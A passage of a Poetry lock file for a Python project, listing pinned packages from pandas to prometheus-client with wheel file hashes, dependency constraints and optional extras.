{file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ce0c6f76a0f1ba361551f3e6dceaff06bde7514a374aa43e33b588ec10420183"},
{file = "pandas-2.0.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba619e410a21d8c387a1ea6e8a0e49bb42216474436245718d7f2e88a2f8d7c0"},
{file = "pandas-2.0.3-cp310-cp310-win32.whl", hash = "sha256:3ef285093b4fe5058eefd756100a367f27029913760773c8bf1d2d8bebe5d210"},
{file = "pandas-2.0.3-cp310-cp310-win_amd64.whl", hash = "sha256:9ee1a69328d5c36c98d8e74db06f4ad518a1840e8ccb94a4ba86920986bb617e"},
{file = "pandas-2.0.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:b084b91d8d66ab19f5bb3256cbd5ea661848338301940e17f4492b2ce0801fe8"},
{file = "pandas-2.0.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:37673e3bdf1551b95bf5d4ce372b37770f9529743d2498032439371fc7b7eb26"},
{file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b9cb1e14fdb546396b7e1b923ffaeeac24e4cedd14266c3497216dd4448e4f2d"},
{file = "pandas-2.0.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d9cd88488cceb7635aebb84809d087468eb33551097d600c6dad13602029c2df"},
{file = "pandas-2.0.3-cp311-cp311-win32.whl", hash = "sha256:694888a81198786f0e164ee3a581df7d505024fbb1f15202fc7db88a71d84ebd"},
{file = "pandas-2.0.3-cp311-cp311-win_amd64.whl", hash = "sha256:6a21ab5c89dcbd57f78d0ae16630b090eec626360085a4148693def5452d8a6b"},
{file = "pandas-2.0.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9e4da0d45e7f34c069fe4d522359df7d23badf83abc1d1cef398895822d11061"},
{file = "pandas-2.0.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:32fca2ee1b0d93dd71d979726b12b61faa06aeb93cf77468776287f41ff8fdc5"},
{file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:258d3624b3ae734490e4d63c430256e716f488c4fcb7c8e9bde2d3aa46c29089"},
{file = "pandas-2.0.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9eae3dc34fa1aa7772dd3fc60270d13ced7346fcbcfee017d3132ec625e23bb0"},
{file = "pandas-2.0.3-cp38-cp38-win32.whl", hash = "sha256:f3421a7afb1a43f7e38e82e844e2bca9a6d793d66c1a7f9f0ff39a795bbc5e02"},
{file = "pandas-2.0.3-cp38-cp38-win_amd64.whl", hash = "sha256:69d7f3884c95da3a31ef82b7618af5710dba95bb885ffab339aad925c3e8ce78"},
{file = "pandas-2.0.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5247fb1ba347c1261cbbf0fcfba4a3121fbb4029d95d9ef4dc45406620b25c8b"},
{file = "pandas-2.0.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:81af086f4543c9d8bb128328b5d32e9986e0c84d3ee673a2ac6fb57fd14f755e"},
{file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1994c789bf12a7c5098277fb43836ce090f1073858c10f9220998ac74f37c69b"},
{file = "pandas-2.0.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5ec591c48e29226bcbb316e0c1e9423622bc7a4eaf1ef7c3c9fa1a3981f89641"},
{file = "pandas-2.0.3-cp39-cp39-win32.whl", hash = "sha256:04dbdbaf2e4d46ca8da896e1805bc04eb85caa9a82e259e8eed00254d5e0c682"},
{file = "pandas-2.0.3-cp39-cp39-win_amd64.whl", hash = "sha256:1168574b036cd8b93abc746171c9b4f1b83467438a5e45909fed645cf8692dbc"},
{file = "pandas-2.0.3.tar.gz", hash = "sha256:c02f372a88e0d17f36d3093a644c73cfc1788e876a7c4bcb4020a77512e2043c"},
]
[package.dependencies]
numpy = [
{version = ">=1.23.2", markers = "python_version >= \"3.11\""},
{version = ">=1.20.3", markers = "python_version < \"3.10\""},
{version = ">=1.21.0", markers = "python_version >= \"3.10\" and python_version < \"3.11\""},
]
python-dateutil = ">=2.8.2"
pytz = ">=2020.1"
tzdata = ">=2022.1"
[package.extras]
all = ["PyQt5 (>=5.15.1)", "SQLAlchemy (>=1.4.16)", "beautifulsoup4 (>=4.9.3)", "bottleneck (>=1.3.2)", "brotlipy (>=0.7.0)", "fastparquet (>=0.6.3)", "fsspec (>=2021.07.0)", "gcsfs (>=2021.07.0)", "html5lib (>=1.1)", "hypothesis (>=6.34.2)", "jinja2 (>=3.0.0)", "lxml (>=4.6.3)", "matplotlib (>=3.6.1)", "numba (>=0.53.1)", "numexpr (>=2.7.3)", "odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pandas-gbq (>=0.15.0)", "psycopg2 (>=2.8.6)", "pyarrow (>=7.0.0)", "pymysql (>=1.0.2)", "pyreadstat (>=1.1.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)", "python-snappy (>=0.6.0)", "pyxlsb (>=1.0.8)", "qtpy (>=2.2.0)", "s3fs (>=2021.08.0)", "scipy (>=1.7.1)", "tables (>=3.6.1)", "tabulate (>=0.8.9)", "xarray (>=0.21.0)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)", "zstandard (>=0.15.2)"]
aws = ["s3fs (>=2021.08.0)"]
clipboard = ["PyQt5 (>=5.15.1)", "qtpy (>=2.2.0)"]
compression = ["brotlipy (>=0.7.0)", "python-snappy (>=0.6.0)", "zstandard (>=0.15.2)"]
computation = ["scipy (>=1.7.1)", "xarray (>=0.21.0)"]
excel = ["odfpy (>=1.4.1)", "openpyxl (>=3.0.7)", "pyxlsb (>=1.0.8)", "xlrd (>=2.0.1)", "xlsxwriter (>=1.4.3)"]
feather = ["pyarrow (>=7.0.0)"]
fss = ["fsspec (>=2021.07.0)"]
gcp = ["gcsfs (>=2021.07.0)", "pandas-gbq (>=0.15.0)"]
hdf5 = ["tables (>=3.6.1)"]
html = ["beautifulsoup4 (>=4.9.3)", "html5lib (>=1.1)", "lxml (>=4.6.3)"]
mysql = ["SQLAlchemy (>=1.4.16)", "pymysql (>=1.0.2)"]
output-formatting = ["jinja2 (>=3.0.0)", "tabulate (>=0.8.9)"]
parquet = ["pyarrow (>=7.0.0)"]
performance = ["bottleneck (>=1.3.2)", "numba (>=0.53.1)", "numexpr (>=2.7.1)"]
plot = ["matplotlib (>=3.6.1)"]
postgresql = ["SQLAlchemy (>=1.4.16)", "psycopg2 (>=2.8.6)"]
spss = ["pyreadstat (>=1.1.2)"]
sql-other = ["SQLAlchemy (>=1.4.16)"]
test = ["hypothesis (>=6.34.2)", "pytest (>=7.3.2)", "pytest-asyncio (>=0.17.0)", "pytest-xdist (>=2.2.0)"]
xml = ["lxml (>=4.6.3)"]
[[package]]
name = "pandocfilters"
version = "1.5.0"
description = "Utilities for writing pandoc filters in python"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
files = [
{file = "pandocfilters-1.5.0-py2.py3-none-any.whl", hash = "sha256:33aae3f25fd1a026079f5d27bdd52496f0e0803b3469282162bafdcbdf6ef14f"},
{file = "pandocfilters-1.5.0.tar.gz", hash = "sha256:0b679503337d233b4339a817bfc8c50064e2eff681314376a47cb582305a7a38"},
]
[[package]]
name = "para"
version = "0.0.8"
description = "a set utilities that ake advantage of python's 'multiprocessing' module to distribute CPU-intensive tasks"
optional = true
python-versions = "*"
files = [
{file = "para-0.0.8-py3-none-any.whl", hash = "sha256:c63b030658cafd84f8fabfc000142324d51c7440e50ef5012fd1a54972ca25f4"},
{file = "para-0.0.8.tar.gz", hash = "sha256:46c3232ae9d8ea9d886cfd08cdd112892202bed8645f40b6255597ba4cfef217"},
]
[[package]]
name = "parso"
version = "0.8.3"
description = "A Python Parser"
optional = false
python-versions = ">=3.6"
files = [
{file = "parso-0.8.3-py2.py3-none-any.whl", hash = "sha256:c001d4636cd3aecdaf33cbb40aebb59b094be2a74c556778ef5576c175e19e75"},
{file = "parso-0.8.3.tar.gz", hash = "sha256:8c07be290bb59f03588915921e29e8a50002acaf2cdc5fa0e0114f91709fafa0"},
]
[package.extras]
qa = ["flake8 (==3.8.3)", "mypy (==0.782)"]
testing = ["docopt", "pytest (<6.0.0)"]
[[package]]
name = "pathos"
version = "0.3.1"
description = "parallel graph management and execution in heterogeneous computing"
optional = true
python-versions = ">=3.7"
files = [
{file = "pathos-0.3.1-py3-none-any.whl", hash = "sha256:b1c7145e2adcc19c7e9cac48f110ea5a63e300c1cc10c2947d4857dc97a47b46"},
{file = "pathos-0.3.1.tar.gz", hash = "sha256:c9a088021493c5cb627d4459bba6c0533c684199e271a5dc297d62be23d74019"},
]
[package.dependencies]
dill = ">=0.3.7"
multiprocess = ">=0.70.15"
pox = ">=0.3.3"
ppft = ">=1.7.6.7"
[[package]]
name = "pathspec"
version = "0.11.2"
description = "Utility library for gitignore style pattern matching of file paths."
optional = false
python-versions = ">=3.7"
files = [
{file = "pathspec-0.11.2-py3-none-any.whl", hash = "sha256:1d6ed233af05e679efb96b1851550ea95bbb64b7c490b0f5aa52996c11e92a20"},
{file = "pathspec-0.11.2.tar.gz", hash = "sha256:e0d8d0ac2f12da61956eb2306b69f9469b42f4deb0f3cb6ed47b9cce9996ced3"},
]
[[package]]
name = "pdfminer-six"
version = "20221105"
description = "PDF parser and analyzer"
optional = true
python-versions = ">=3.6"
files = [
{file = "pdfminer.six-20221105-py3-none-any.whl", hash = "sha256:1eaddd712d5b2732f8ac8486824533514f8ba12a0787b3d5fe1e686cd826532d"},
{file = "pdfminer.six-20221105.tar.gz", hash = "sha256:8448ab7b939d18b64820478ecac5394f482d7a79f5f7eaa7703c6c959c175e1d"},
]
[package.dependencies]
charset-normalizer = ">=2.0.0"
cryptography = ">=36.0.0"
[package.extras]
dev = ["black", "mypy (==0.931)", "nox", "pytest"]
docs = ["sphinx", "sphinx-argparse"]
image = ["Pillow"]
[[package]]
name = "pexpect"
version = "4.8.0"
description = "Pexpect allows easy control of interactive console applications."
optional = false
python-versions = "*"
files = [
{file = "pexpect-4.8.0-py2.py3-none-any.whl", hash = "sha256:0b48a55dcb3c05f3329815901ea4fc1537514d6ba867a152b581d69ae3710937"},
{file = "pexpect-4.8.0.tar.gz", hash = "sha256:fc65a43959d153d0114afe13997d439c22823a27cefceb5ff35c2178c6784c0c"},
]
[package.dependencies]
ptyprocess = ">=0.5"
[[package]]
name = "pgvector"
version = "0.1.8"
description = "pgvector support for Python"
optional = true
python-versions = ">=3.6"
files = [
{file = "pgvector-0.1.8-py2.py3-none-any.whl", hash = "sha256:99dce3a6580ef73863edb9b8441937671f4e1a09383826e6b0838176cd441a96"},
]
[package.dependencies]
numpy = "*"
[[package]]
name = "pickleshare"
version = "0.7.5"
description = "Tiny 'shelve'-like database with concurrency support"
optional = false
python-versions = "*"
files = [
{file = "pickleshare-0.7.5-py2.py3-none-any.whl", hash = "sha256:9649af414d74d4df115d5d718f82acb59c9d418196b7b4290ed47a12ce62df56"},
{file = "pickleshare-0.7.5.tar.gz", hash = "sha256:87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"},
]
[[package]]
name = "pillow"
version = "10.1.0"
description = "Python Imaging Library (Fork)"
optional = true
python-versions = ">=3.8"
files = [
{file = "Pillow-10.1.0-cp310-cp310-macosx_10_10_x86_64.whl", hash = "sha256:1ab05f3db77e98f93964697c8efc49c7954b08dd61cff526b7f2531a22410106"},
{file = "Pillow-10.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:6932a7652464746fcb484f7fc3618e6503d2066d853f68a4bd97193a3996e273"},
{file = "Pillow-10.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a5f63b5a68daedc54c7c3464508d8c12075e56dcfbd42f8c1bf40169061ae666"},
{file = "Pillow-10.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c0949b55eb607898e28eaccb525ab104b2d86542a85c74baf3a6dc24002edec2"},
{file = "Pillow-10.1.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:ae88931f93214777c7a3aa0a8f92a683f83ecde27f65a45f95f22d289a69e593"},
{file = "Pillow-10.1.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:b0eb01ca85b2361b09480784a7931fc648ed8b7836f01fb9241141b968feb1db"},
{file = "Pillow-10.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d27b5997bdd2eb9fb199982bb7eb6164db0426904020dc38c10203187ae2ff2f"},
{file = "Pillow-10.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:7df5608bc38bd37ef585ae9c38c9cd46d7c81498f086915b0f97255ea60c2818"},
{file = "Pillow-10.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:41f67248d92a5e0a2076d3517d8d4b1e41a97e2df10eb8f93106c89107f38b57"},
{file = "Pillow-10.1.0-cp311-cp311-macosx_10_10_x86_64.whl", hash = "sha256:1fb29c07478e6c06a46b867e43b0bcdb241b44cc52be9bc25ce5944eed4648e7"},
{file = "Pillow-10.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:2cdc65a46e74514ce742c2013cd4a2d12e8553e3a2563c64879f7c7e4d28bce7"},
{file = "Pillow-10.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50d08cd0a2ecd2a8657bd3d82c71efd5a58edb04d9308185d66c3a5a5bed9610"},
{file = "Pillow-10.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:062a1610e3bc258bff2328ec43f34244fcec972ee0717200cb1425214fe5b839"},
{file = "Pillow-10.1.0-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:61f1a9d247317fa08a308daaa8ee7b3f760ab1809ca2da14ecc88ae4257d6172"},
{file = "Pillow-10.1.0-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:a646e48de237d860c36e0db37ecaecaa3619e6f3e9d5319e527ccbc8151df061"},
{file = "Pillow-10.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:47e5bf85b80abc03be7455c95b6d6e4896a62f6541c1f2ce77a7d2bb832af262"},
{file = "Pillow-10.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:a92386125e9ee90381c3369f57a2a50fa9e6aa8b1cf1d9c4b200d41a7dd8e992"},
{file = "Pillow-10.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:0f7c276c05a9767e877a0b4c5050c8bee6a6d960d7f0c11ebda6b99746068c2a"},
{file = "Pillow-10.1.0-cp312-cp312-macosx_10_10_x86_64.whl", hash = "sha256:a89b8312d51715b510a4fe9fc13686283f376cfd5abca8cd1c65e4c76e21081b"},
{file = "Pillow-10.1.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:00f438bb841382b15d7deb9a05cc946ee0f2c352653c7aa659e75e592f6fa17d"},
{file = "Pillow-10.1.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3d929a19f5469b3f4df33a3df2983db070ebb2088a1e145e18facbc28cae5b27"},
{file = "Pillow-10.1.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9a92109192b360634a4489c0c756364c0c3a2992906752165ecb50544c251312"},
{file = "Pillow-10.1.0-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:0248f86b3ea061e67817c47ecbe82c23f9dd5d5226200eb9090b3873d3ca32de"},
{file = "Pillow-10.1.0-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:9882a7451c680c12f232a422730f986a1fcd808da0fd428f08b671237237d651"},
{file = "Pillow-10.1.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:1c3ac5423c8c1da5928aa12c6e258921956757d976405e9467c5f39d1d577a4b"},
{file = "Pillow-10.1.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:806abdd8249ba3953c33742506fe414880bad78ac25cc9a9b1c6ae97bedd573f"},
{file = "Pillow-10.1.0-cp312-cp312-win_amd64.whl", hash = "sha256:eaed6977fa73408b7b8a24e8b14e59e1668cfc0f4c40193ea7ced8e210adf996"},
{file = "Pillow-10.1.0-cp38-cp38-macosx_10_10_x86_64.whl", hash = "sha256:fe1e26e1ffc38be097f0ba1d0d07fcade2bcfd1d023cda5b29935ae8052bd793"},
{file = "Pillow-10.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7a7e3daa202beb61821c06d2517428e8e7c1aab08943e92ec9e5755c2fc9ba5e"},
{file = "Pillow-10.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:24fadc71218ad2b8ffe437b54876c9382b4a29e030a05a9879f615091f42ffc2"},
{file = "Pillow-10.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fa1d323703cfdac2036af05191b969b910d8f115cf53093125e4058f62012c9a"},
{file = "Pillow-10.1.0-cp38-cp38-manylinux_2_28_aarch64.whl", hash = "sha256:912e3812a1dbbc834da2b32299b124b5ddcb664ed354916fd1ed6f193f0e2d01"},
{file = "Pillow-10.1.0-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:7dbaa3c7de82ef37e7708521be41db5565004258ca76945ad74a8e998c30af8d"},
{file = "Pillow-10.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9d7bc666bd8c5a4225e7ac71f2f9d12466ec555e89092728ea0f5c0c2422ea80"},
{file = "Pillow-10.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:baada14941c83079bf84c037e2d8b7506ce201e92e3d2fa0d1303507a8538212"},
{file = "Pillow-10.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:2ef6721c97894a7aa77723740a09547197533146fba8355e86d6d9a4a1056b14"},
{file = "Pillow-10.1.0-cp39-cp39-macosx_10_10_x86_64.whl", hash = "sha256:0a026c188be3b443916179f5d04548092e253beb0c3e2ee0a4e2cdad72f66099"},
{file = "Pillow-10.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:04f6f6149f266a100374ca3cc368b67fb27c4af9f1cc8cb6306d849dcdf12616"},
{file = "Pillow-10.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bb40c011447712d2e19cc261c82655f75f32cb724788df315ed992a4d65696bb"},
{file = "Pillow-10.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1a8413794b4ad9719346cd9306118450b7b00d9a15846451549314a58ac42219"},
{file = "Pillow-10.1.0-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:c9aeea7b63edb7884b031a35305629a7593272b54f429a9869a4f63a1bf04c34"},
{file = "Pillow-10.1.0-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:b4005fee46ed9be0b8fb42be0c20e79411533d1fd58edabebc0dd24626882cfd"},
{file = "Pillow-10.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4d0152565c6aa6ebbfb1e5d8624140a440f2b99bf7afaafbdbf6430426497f28"},
{file = "Pillow-10.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d921bc90b1defa55c9917ca6b6b71430e4286fc9e44c55ead78ca1a9f9eba5f2"},
{file = "Pillow-10.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:cfe96560c6ce2f4c07d6647af2d0f3c54cc33289894ebd88cfbb3bcd5391e256"},
{file = "Pillow-10.1.0-pp310-pypy310_pp73-macosx_10_10_x86_64.whl", hash = "sha256:937bdc5a7f5343d1c97dc98149a0be7eb9704e937fe3dc7140e229ae4fc572a7"},
{file = "Pillow-10.1.0-pp310-pypy310_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b1c25762197144e211efb5f4e8ad656f36c8d214d390585d1d21281f46d556ba"},
{file = "Pillow-10.1.0-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:afc8eef765d948543a4775f00b7b8c079b3321d6b675dde0d02afa2ee23000b4"},
{file = "Pillow-10.1.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:883f216eac8712b83a63f41b76ddfb7b2afab1b74abbb413c5df6680f071a6b9"},
{file = "Pillow-10.1.0-pp39-pypy39_pp73-macosx_10_10_x86_64.whl", hash = "sha256:b920e4d028f6442bea9a75b7491c063f0b9a3972520731ed26c83e254302eb1e"},
{file = "Pillow-10.1.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1c41d960babf951e01a49c9746f92c5a7e0d939d1652d7ba30f6b3090f27e412"},
{file = "Pillow-10.1.0-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:1fafabe50a6977ac70dfe829b2d5735fd54e190ab55259ec8aea4aaea412fa0b"},
{file = "Pillow-10.1.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:3b834f4b16173e5b92ab6566f0473bfb09f939ba14b23b8da1f54fa63e4b623f"},
{file = "Pillow-10.1.0.tar.gz", hash = "sha256:e6bf8de6c36ed96c86ea3b6e1d5273c53f46ef518a062464cd7ef5dd2cf92e38"},
]
[package.extras]
docs = ["furo", "olefile", "sphinx (>=2.4)", "sphinx-copybutton", "sphinx-inline-tabs", "sphinx-removed-in", "sphinxext-opengraph"]
tests = ["check-manifest", "coverage", "defusedxml", "markdown2", "olefile", "packaging", "pyroma", "pytest", "pytest-cov", "pytest-timeout"]
[[package]]
name = "pinecone-client"
version = "2.2.4"
description = "Pinecone client and SDK"
optional = true
python-versions = ">=3.8"
files = [
{file = "pinecone-client-2.2.4.tar.gz", hash = "sha256:2c1cc1d6648b2be66e944db2ffa59166a37b9164d1135ad525d9cd8b1e298168"},
{file = "pinecone_client-2.2.4-py3-none-any.whl", hash = "sha256:5bf496c01c2f82f4e5c2dc977cc5062ecd7168b8ed90743b09afcc8c7eb242ec"},
]
[package.dependencies]
dnspython = ">=2.0.0"
loguru = ">=0.5.0"
numpy = ">=1.22.0"
python-dateutil = ">=2.5.3"
pyyaml = ">=5.4"
requests = ">=2.19.0"
tqdm = ">=4.64.1"
typing-extensions = ">=3.7.4"
urllib3 = ">=1.21.1"
[package.extras]
grpc = ["googleapis-common-protos (>=1.53.0)", "grpc-gateway-protoc-gen-openapiv2 (==0.1.0)", "grpcio (>=1.44.0)", "lz4 (>=3.1.3)", "protobuf (>=3.20.0,<3.21.0)"]
[[package]]
name = "pinecone-text"
version = "0.4.2"
description = "Text utilities library by Pinecone.io"
optional = true
python-versions = ">=3.8,<4.0"
files = [
{file = "pinecone_text-0.4.2-py3-none-any.whl", hash = "sha256:79468c197b2fc7738c1511a6b5b8e7697fad613604ad935661a438f621ad2004"},
{file = "pinecone_text-0.4.2.tar.gz", hash = "sha256:131d9d1cc5654bdff8c4e497bb00e54fcab07a3b501e38aa16a6f19c2f00d4c6"},
]
[package.dependencies]
mmh3 = ">=3.1.0,<4.0.0"
nltk = ">=3.6.5,<4.0.0"
sentence-transformers = ">=2.0.0,<3.0.0"
torch = ">=1.13.1,<2.0.0"
transformers = ">=4.26.1,<5.0.0"
wget = ">=3.2,<4.0"
[[package]]
name = "pkgutil-resolve-name"
version = "1.3.10"
description = "Resolve a name to an object."
optional = false
python-versions = ">=3.6"
files = [
{file = "pkgutil_resolve_name-1.3.10-py3-none-any.whl", hash = "sha256:ca27cc078d25c5ad71a9de0a7a330146c4e014c2462d9af19c6b828280649c5e"},
{file = "pkgutil_resolve_name-1.3.10.tar.gz", hash = "sha256:357d6c9e6a755653cfd78893817c0853af365dd51ec97f3d358a819373bbd174"},
]
[[package]]
name = "platformdirs"
version = "3.11.0"
description = "A small Python package for determining appropriate platform-specific dirs, e.g. a \"user data dir\"."
optional = false
python-versions = ">=3.7"
files = [
{file = "platformdirs-3.11.0-py3-none-any.whl", hash = "sha256:e9d171d00af68be50e9202731309c4e658fd8bc76f55c11c7dd760d023bda68e"},
{file = "platformdirs-3.11.0.tar.gz", hash = "sha256:cf8ee52a3afdb965072dcc652433e0c7e3e40cf5ea1477cd4b3b1d2eb75495b3"},
]
[package.extras]
docs = ["furo (>=2023.7.26)", "proselint (>=0.13)", "sphinx (>=7.1.1)", "sphinx-autodoc-typehints (>=1.24)"]
test = ["appdirs (==1.4.4)", "covdefaults (>=2.3)", "pytest (>=7.4)", "pytest-cov (>=4.1)", "pytest-mock (>=3.11.1)"]
[[package]]
name = "playwright"
version = "1.39.0"
description = "A high-level API to automate web browsers"
optional = false
python-versions = ">=3.8"
files = [
{file = "playwright-1.39.0-py3-none-macosx_10_13_x86_64.whl", hash = "sha256:384e195a6d09343f319031cf552e9cd601ede78fe9c082b9fa197537c5cbfe7a"},
{file = "playwright-1.39.0-py3-none-macosx_11_0_arm64.whl", hash = "sha256:d2c3634411828d9273196ed6f69f2fa7645c89732b3c982dcf09ab03ed4c5d2b"},
{file = "playwright-1.39.0-py3-none-macosx_11_0_universal2.whl", hash = "sha256:d2fd90f370599cf9a2c6a041bd79a5eeec62baf0e943c7c5c2079b29be476d2a"},
{file = "playwright-1.39.0-py3-none-manylinux1_x86_64.whl", hash = "sha256:699a8e707ca5f3567aa28223ee1be7e42d2bf25eda7d3d86babda71e36e5f16f"},
{file = "playwright-1.39.0-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:654bb3ae0dc3c69ffddc0c38c127c3b8e93032d8cf3928e2c4f21890cb39514b"},
{file = "playwright-1.39.0-py3-none-win32.whl", hash = "sha256:40ed7f2546c64f1bb3d22b2295b4d43ed5a2f0b7ea7599d93a72f723a1883e1e"},
{file = "playwright-1.39.0-py3-none-win_amd64.whl", hash = "sha256:a420d814e21b05e1156747e2a9fae6c3cca2b46bb4a0226fb26ee65538ce09c9"},
]
[package.dependencies]
greenlet = "3.0.0"
pyee = "11.0.1"
typing-extensions = {version = "*", markers = "python_version <= \"3.8\""}
[[package]]
name = "pluggy"
version = "1.3.0"
description = "plugin and hook calling mechanisms for python"
optional = false
python-versions = ">=3.8"
files = [
{file = "pluggy-1.3.0-py3-none-any.whl", hash = "sha256:d89c696a773f8bd377d18e5ecda92b7a3793cbe66c87060a6fb58c7b6e1061f7"},
{file = "pluggy-1.3.0.tar.gz", hash = "sha256:cf61ae8f126ac6f7c451172cf30e3e43d3ca77615509771b3a984a0730651e12"},
]
[package.extras]
dev = ["pre-commit", "tox"]
testing = ["pytest", "pytest-benchmark"]
[[package]]
name = "pooch"
version = "1.8.0"
description = "\"Pooch manages your Python library's sample data files: it automatically downloads and stores them in a local directory, with support for versioning and corruption checks.\""
optional = true
python-versions = ">=3.7"
files = [
{file = "pooch-1.8.0-py3-none-any.whl", hash = "sha256:1bfba436d9e2ad5199ccad3583cca8c241b8736b5bb23fe67c213d52650dbb66"},
{file = "pooch-1.8.0.tar.gz", hash = "sha256:f59981fd5b9b5d032dcde8f4a11eaa492c2ac6343fae3596a2fdae35fc54b0a0"},
]
[package.dependencies]
packaging = ">=20.0"
platformdirs = ">=2.5.0"
requests = ">=2.19.0"
[package.extras]
progress = ["tqdm (>=4.41.0,<5.0.0)"]
sftp = ["paramiko (>=2.7.0)"]
xxhash = ["xxhash (>=1.4.3)"]
[[package]]
name = "portalocker"
version = "2.8.2"
description = "Wraps the portalocker recipe for easy usage"
optional = true
python-versions = ">=3.8"
files = [
{file = "portalocker-2.8.2-py3-none-any.whl", hash = "sha256:cfb86acc09b9aa7c3b43594e19be1345b9d16af3feb08bf92f23d4dce513a28e"},
{file = "portalocker-2.8.2.tar.gz", hash = "sha256:2b035aa7828e46c58e9b31390ee1f169b98e1066ab10b9a6a861fe7e25ee4f33"},
]
[package.dependencies]
pywin32 = {version = ">=226", markers = "platform_system == \"Windows\""}
[package.extras]
docs = ["sphinx (>=1.7.1)"]
redis = ["redis"]
tests = ["pytest (>=5.4.1)", "pytest-cov (>=2.8.1)", "pytest-mypy (>=0.8.0)", "pytest-timeout (>=2.1.0)", "redis", "sphinx (>=6.0.0)", "types-redis"]
[[package]]
name = "pox"
version = "0.3.3"
description = "utilities for filesystem exploration and automated builds"
optional = true
python-versions = ">=3.7"
files = [
{file = "pox-0.3.3-py3-none-any.whl", hash = "sha256:e95febf7401918478a3c1441a3630656d9a2049803889b4f589821372889d0ce"},
{file = "pox-0.3.3.tar.gz", hash = "sha256:e1ced66f2a0c92a58cf3646bc7ccb8b4773d40884b76f85eeda0670474871667"},
]
[[package]]
name = "ppft"
version = "1.7.6.7"
description = "distributed and parallel Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "ppft-1.7.6.7-py3-none-any.whl", hash = "sha256:fedb1b1253729d62483f2e1f36547fd50a5fc873ffbf9b78b48cfdc727d4180c"},
{file = "ppft-1.7.6.7.tar.gz", hash = "sha256:ab34436814e2f18238f35688fd869b2641b2d2d8dca22b8d246f6701dfc954c8"},
]
[package.extras]
dill = ["dill (>=0.3.7)"]
[[package]]
name = "prometheus-client"
version = "0.17.1"
description = "Python client for the Prometheus monitoring system."
optional = false
python-versions = ">=3.6"
files = [
